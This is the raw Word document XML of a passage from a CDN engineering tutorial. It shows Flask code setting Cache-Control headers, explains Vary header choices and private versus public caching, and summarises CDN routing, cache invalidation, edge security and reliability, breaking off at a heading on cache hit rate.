      <w:r w:rsidRPr="00784ED6">
        <w:t>def static_files(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467CE348" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response = send_file(f'static/{filename}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40282902" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    # Content-addressed filename (includes hash) — safe to cache forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA021F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response.headers['Cache-Control'] = 'public, max-age=31536000, immutable'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF05BA4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F89080" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="42CC43F5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>@app.route('/api/products/&lt;int:product_id&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157F675" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>def get_product(product_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696A1ED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    product = db.get_product(product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCEB626" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response = jsonify(product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E9A5C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    # Dynamic API — short TTL, allow stale serving during revalidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE48AFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response.headers['Cache-Control'] = 'public, max-age=60, stale-while-revalidate=600'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB52EBB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response.headers['Surrogate-Key'] = f'product-{product_id} category-{product.category}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE8A89" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    return response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A57200" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="611347BC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>@app.route('/api/user/profile')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3DA0E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>def user_profile():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC10DFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    # Private user data — must never be cached at CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242D157" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response = jsonify(get_current_user())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865F16B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    response.headers['Cache-Control'] = 'private, no-store'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB3E42" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    return response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C04024" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The private vs public distinction is critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69A0EF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public — the CDN may cache this response and serve it to any user. Cache-Control: private — the response contains user-specific data and must only be cached in the user's browser. CDN must not cache it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FD454" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Serving a private response to the wrong user (because the CDN incorrectly cached it) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>security incident</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — user data exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E917CBE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vary header discipline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B8A3F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The origin must declare all request dimensions that affect the response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA36B3A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E556FD5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: Accept-Encoding         (serve different compression based on client support)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAFF73F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Vary: Accept-Language         (serve different language based on client preference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD26EB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: Accept                  (serve different format — JSON vs XML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BAE919" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Do NOT include in Vary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D5B38" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F145FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: User-Agent              (fragment cache into thousands of variants — terrible for hit rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16E229" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: Cookie                  (effectively disables caching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF2446" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: Authorization           (effectively disables caching for authenticated responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F620E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>For authenticated responses that should be cached per-user, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067177A6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Strip the authentication cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07D67F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Set the user ID as a separate, normalized cache key dimension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BCB302" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache per user-ID rather than per full cookie string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472C2AA5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="04BE44C0">
          <v:rect id="_x0000_i4558" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="046CCA65" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D3EFC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17862F87" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN = Globally Distributed Caching + Performance + Security + Reliability Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA09B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="74B26EE4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The Three Fundamental Problems CDNs Solve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C550561" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  1. Speed of Light: Geographic proximity eliminates propagation delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BC5173" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">     Tokyo user + Tokyo PoP = 2ms vs Tokyo user + Virginia origin = 150ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D8252" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD3996" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  2. Fan-Out: Caching converts N origin requests into 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27195E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">     10M concurrent users × same content = 1 origin fetch + cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04F7F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A90616" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  3. DDoS Scale: Aggregate capacity exceeds attack capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B478C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">     100+ Tbps aggregate CDN capacity vs multi-Tbps attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD47942" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="3B3CCA0B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>The Physical Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261FE582" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Edge PoPs (thousands) → Regional PoPs (hundreds) → Origin Shield (tens) → Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B47A14" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Each tier: larger cache, fewer nodes, higher hit rate for long-tail content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC208B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Tiering multiplies bandwidth savings: 5,000 misses → 500 → 10 → 1 origin request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A392EB7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="0EC2017E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Traffic Routing Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFFE8A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  GeoDNS:    DNS returns nearest PoP IP based on resolver/client location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794BDB7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">             Fast failover (within TTL), accurate with EDNS Client Subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603ED731" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Anycast:   Same IP announced from all PoPs via BGP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D2581A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">             Automatic routing to nearest PoP, instant DDoS distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518ACD76" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">             Connection-stable (TCP flows don't migrate mid-connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F916E9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="72F0C9D3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache Correctness Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B940C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache Key:  URL + Vary dimensions (normalized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB5585" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">              Too narrow = wrong content served to wrong users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C9BE6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">              Too broad = cache fragmented, hit rate collapses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C356C19" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  TTL:        max-age (freshness window) + stale-while-revalidate (async refresh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7880AEA1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">              + stale-if-error (resilience during origin outages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB8557D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Invalidation: Surrogate keys/cache tags &gt; URL purge &gt; TTL expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4981D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">              Content-addressed URLs = infinite TTL, no invalidation needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C8C8A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="3DE87B93" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Performance Beyond Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD99065" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  TLS at edge:  Eliminate propagation delay from handshake (150ms → 2ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27852BF0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  HTTP/2+3:     Multiplexing, header compression, 0-RTT resumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF36756" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  TCP BBR:      Fill pipe faster on high-BDP paths, avoid buffer bloat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D01D38" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Image opt:    Real-time WebP/AVIF conversion, resize at edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDB20E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Early Hints:  103 response starts subresource loading before 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A48C37" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="5EA3FE9C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Security at the Edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B7E56" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  DDoS:    Anycast spreads attack across 100+ Tbps aggregate capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA9703" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  WAF:     OWASP CRS + ML anomaly detection, blocks before origin exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE02BE6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Bot:     JS challenge, browser fingerprinting, behavioral analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29010048" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  HTTPS:   Automatic certificate provisioning, HSTS enforcement, OCSP stapling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26748906" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="5FB96DDD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Reliability Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8AA73" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Multiple PoPs per region → facility-level redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326FDE96" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Anycast failover → BGP withdraws failed PoP, traffic reroutes in 30-120s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAEE0C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Origin shield → collapses edge misses, protects origin from direct exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AF5C4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Stale-if-error → serve cached content during origin outages (up to days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3048C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="48922602" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The Cache Hit Rate Equation (most important CDN metric):</w:t>
      </w:r>
    </w:p>
